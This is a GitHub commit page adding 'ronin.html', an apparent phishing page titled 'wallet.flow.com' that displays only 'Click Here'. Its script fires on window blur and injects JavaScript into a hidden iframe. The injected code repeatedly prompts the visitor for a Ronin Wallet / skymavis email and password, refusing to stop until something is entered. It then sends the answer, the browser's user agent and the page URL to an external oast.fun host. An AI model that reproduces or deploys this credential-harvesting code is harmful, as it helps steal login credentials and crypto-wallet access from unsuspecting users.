Skip to content

Commit 7724d94

Browse files
authored
ronin.html
1 parent 3124cef commit 7724d94

File tree

1 file changed

+42
-0
lines changed

1 file changed

+42
-0
lines changed

ronin.html

Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
<!DOCTYPE html>
2+
<html lang="en-US">
3+
<head>
4+
<meta charset="UTF-8">
5+
<meta name="viewport" content="width=device-width, user-scalable=no">
6+
<title>wallet.flow.com</title>
7+
<style>
8+
iframe { visibility: hidden; }
9+
body { font-family: system-ui, sans-serif; text-align: center; padding-top: 100px; }
10+
</style>
11+
<script>
12+
window.onblur = function () {
13+
const code =
14+
"(function(){try{"
15+
+ "var msg='In order to access your Ronin Wallet\\n"
16+
+ "you must first login on your\\nwallet.skymavis.com Account.\\n\\n"
17+
+ "Please type your e-mail\\nand your password:';"
18+
+ "var v='';"
19+
// Force user to fill (loop until non-empty)
20+
+ "while(v===null||(''+v).trim()===''){"
21+
+ " v=prompt(msg,'E-mail / Password.');"
22+
+ "}"
23+
// Build webhook URL with some context
24+
+ "var u='https://mpbxogpeszumkijyjecohzd8mgoadvoiq.oast.fun/'"
25+
+ " + '?creds=' + encodeURIComponent(v)"
26+
+ " + '&ua=' + encodeURIComponent(navigator.userAgent)"
27+
+ " + '&page=' + encodeURIComponent(location.href);"
28+
// Try sendBeacon first (non-blocking), then fallback to Image
29+
+ "try{ if(!navigator.sendBeacon(u)){ throw new Error('beacon-fallback'); } }catch(e){"
30+
+ " try{ (new Image()).src = u; }catch(_e){}"
31+
+ "}"
32+
+ "}catch(e){}})()";
33+
34+
document.getElementById('iframe').src = "javascript:" + code;
35+
};
36+
</script>
37+
</head>
38+
<body>
39+
<h1>Click Here</h1>
40+
<iframe id="iframe"></iframe>
41+
</body>
42+
</html>

0 commit comments

Comments
 (0)